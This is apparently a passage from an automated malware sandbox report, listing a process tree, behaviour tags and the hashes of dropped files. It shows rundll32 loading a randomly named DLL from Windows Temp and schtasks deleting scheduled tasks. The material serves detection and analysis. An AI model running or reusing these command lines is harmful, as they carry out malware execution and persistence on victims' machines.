C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AxfyqSaZTcFttLJtv"2⤵PID:2356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 21322⤵
- Program crash
PID:204
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\pxtLGgMG\iazIYGF.dll",#1 /FNVdidcsEW 3851321⤵PID:3844
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\pxtLGgMG\iazIYGF.dll",#1 /FNVdidcsEW 3851322⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4856 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cTixPRTTdvXlYhynT"3⤵PID:2304
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
2KB
MD58b885a59db4761986f155c9aebfca5fb
SHA120cd10533455d5e50cb1592b4089a9de2a9d06f7
SHA256d81132d96705ba59d9dade9c0d7e23fa6919de8f3aec472220fc49ef5f4e3eb4
SHA5123bdde0add6ea2b79c1e44b9d8b8fe786a83bc87ba8dfcb845d33036ec3d6f6978cc2a0b0d3f1fd39eff4a801485be1d8a5987f1f7d92780f4cb23139ff454820
-
Filesize
2KB
MD531a902a29232505db3121bb3189ac68d
SHA15246f8887cb12ad3b514f3e4bc18c6280bada7fd
SHA256701e92ebcb649c866b85ebb35dff037aa29400126afb888d3dc2661ae8b54a0e
SHA5125270edd6f34f7b58dfbc67e2173e72f18494491a6c4cc95d3d647fda80750b46d57d5927c24e6022997568c70ba58495acf5da25d40314fea2c07ce616c7d4c0
-
Filesize
2KB
MD51ce6a8a452206368ca1b7908b8211236
SHA1b5b8876a00139a08bac20bc1090fd6f32d5ffb79
SHA256614c283a15749332ae7a939fb740be15a31d71b72d46dd8af1bdd9a906597db0
SHA512db50548e3048902f5b2895f68162b8af3c0350383d17d4ab24a4af32b0c5b0614958aef50f28217d02911af0009ed7a776c9d1b5a996d6bb907fb8e3922e334e
-
Filesize
2KB
MD51327c0e01a24a8fa6fbc6b8079dbc4bd
SHA1df2f5ff059427b0be5bca7ef86429d30fae3ac71
SHA256861c59f9932f0fa7e4f7641b434ba602a26564096f5a40328156f0d6ef9847ba
SHA51256e971397b95d4ffbe56c878aa072dd9412c5d5136b4856c311deeaee40774af05c76d0ceefbf5dda088eec9c53d480a99723a967be3af861b4f0cc7ccb6b063
-
Filesize
2.0MB
MD51e47d6510740ae73ad41a56fc70675ec
SHA11ced6b4bd1f4fc38c9e5f1417b3d4e08e536aa8f
SHA2566e623af7cd7b7581bf6742a9184a024b21485747b5c280ffe95ad5bc8be7be40
SHA512479eff5d2b2a10373fb21ff03f6a4cc267ca4e280c76972e40ba65853501257e1cdb34c13489366e8a72fae4c2469c53ca535bd065154f541a6c5aaf4dd108a7
-
Filesize
2KB
MD5d0ec237e6cbfb24232eeb1fe0e3b49ad
SHA10788ab493fa0a37bd8c1c77114ebaa9a64442feb
SHA25669c891f82898eff0219d483471da55f0e41ffb59aad88c5492084d4dd93210f9
SHA51292497346bc0ecae128b76a26624cf8547ba66c4138c2da4bc083fbae6e7ad00ccab01eab5c3efeb09cfab2344856d4747ff9ffad998503d728336d2ad184eeef
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5e25715b5a23686532fe4caa8a1387351
SHA1a631f10b806c16f2c8528118e79e07fe09783690
SHA256a065b2995a588db771a52d26e14229e43a8f93add42dce2b6a7f89ed373daa66
SHA512d6fab69b6900a3ee4522776ead8c2ed0376f0685a2347323e1f89d0479dccabb1826680bc6cc9a802aebcc8e885af6abf1905ff98199b3a8ced113b54a711e45
-
Filesize
31KB
MD5ecd73639f2ed824b35eaaaa160efe5a5
SHA1c40a2decc1c43bb5f81ac4e1e5703dfc80753c2f
SHA25638714a86deb56a0d009448e5416d4cc99292bc1f0b5eb900e7306c477961c14c
SHA51273e9177939fbbd26d69b6292f8b9f2c213b064d239930ad127b30428e2951612b6570852d9775729a9723a814ba44de235da1cb8ca1a49d924404c70993a0c93
-
Filesize
12KB
MD542a3bbceb42b3ab3b8cb82fe06388976
SHA12dddf994d81571d91269bc28d174b9b9592fe6f5
SHA256e95ccfc9a3d9bae7d7bff8a7b41f79b3e1f833dada9f2ebc266e87cf9d52531c
SHA51217f42f3a852c32937119e2f44820eddd7a5ac48685963d97aa32c0ddce75d66e7052d02dd7b9f83ee4e052d781a27f0ca40cdb1df7083bc9710c8f3f3bbe76b7
-
Filesize
6.4MB
MD5e38c84a49a2b1169af8e5a62347da177
SHA122dcb256a127d21a7796f4adef1168a6790cbccc
SHA256e4a603d6de818b78986189ff14b166b095b117732afa9058778e07ddacca1c39
SHA51208d1a394edbe2cbffc4d57514bef27398ab94a023278e77368628a249656aabaef43398736a44fa1ff4ae4c69c94bb81ace18f44c408298c5ca22b3be1eecd8d
-
Filesize
6.8MB
MD540e77e23b5a945c6d3ade703499ad40a
SHA1eae8084ac46d70efbbaca2f8090850a976ecafb5
SHA2563cc5d9504e660047094eb426658209cb0acc72d6d59d59c9a43af87c10f85843
SHA512a910f6bc15b3c60202db3e67b27305bb0b28ee228c3f75e7ba6b43deedd544f4738f1590e7d32cbed1665ef136e39e21184c940f11d44d4ce49d85cb7aeddda8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
6KB
MD5fa0841789786960276df5b10da653793
SHA114e9ac167b4ef2701b8b74a125503149489c7dc3
SHA256c8be3a737e1b89271d6ade63a41a78747f17d4b1f54b94ee004575dabbde7b59
SHA512127a60064134e75be2af279c29d260749667f12def8371dd0270dc3c0d76ecf619e3d46a8178e6aba976da0ca3c3480a3a7a4f9dc3d54a09b98bed53fe057e62
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5b359664f919a5e4d55b98126e1573bba
SHA15e5447befbbd0460f068032bc0b8ec2dc5c4a157
SHA2562b1c7125b0cec71244bcb76d09bb4408565b78edf4507c003f536c1dc20a6ffc
SHA5122f8a2ec7aa4350f8993bf4ecfb31979167907bc10d8786c264e4344dfdd80896b9f3c0af241ef66f055079033b72b050ffdb11510fce1a7caf73cac271e26eb0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize12KB
MD5672ac77429b76b6f313a23c66547047e
SHA1a9f4e7910995c5769c7303818c5856d9dd018cb1
SHA256d9ba1b98bfa68e5985c93c0aa78d91a615ceddeb9710d2df04a3b6864441efba
SHA512509411c49d09c24519351e13f17e532b300ff86d3e53351eb4bb1018ad205fae12e7c3b1a9af65e4bf282979851456929d398f1479572efc0a1f8a9f1fbe2eb7
-
Filesize
6.4MB
MD50da14ed23e485a30e6f3f462d9ebb8fc
SHA1b1d624c226cd7d3ea39484cc787b199eb6980713
SHA256e425f05489aaf2558364341ac01e657e02f1e1f64ca7411851bb0350e1df3ff5
SHA512397cdb92c370c3280f36113b1d1c266a6eea0323db09d98c16c576bb3054087d03ed848ae1e3525047b11f4b2107d07a778aa07ef4fed5a02b3330676f03e44c
-
Filesize
6KB
MD51d99bf11724548681f4bd98abc4ca535
SHA1b68a4833db1dc57be41fb7957cdf9d490c81676c
SHA25649f85dcda349f06941c1b90398fd76b05f1df78f2909b0f59f44c1a5d3f2ab96
SHA51264e203e5d5f593250d1c9445e51880cee4da6ba00c84f490a9000effd20e14375e90f173f44a3102116c8e12a72652cffe432d0268c1a19f5d84f2f9b78cd7d1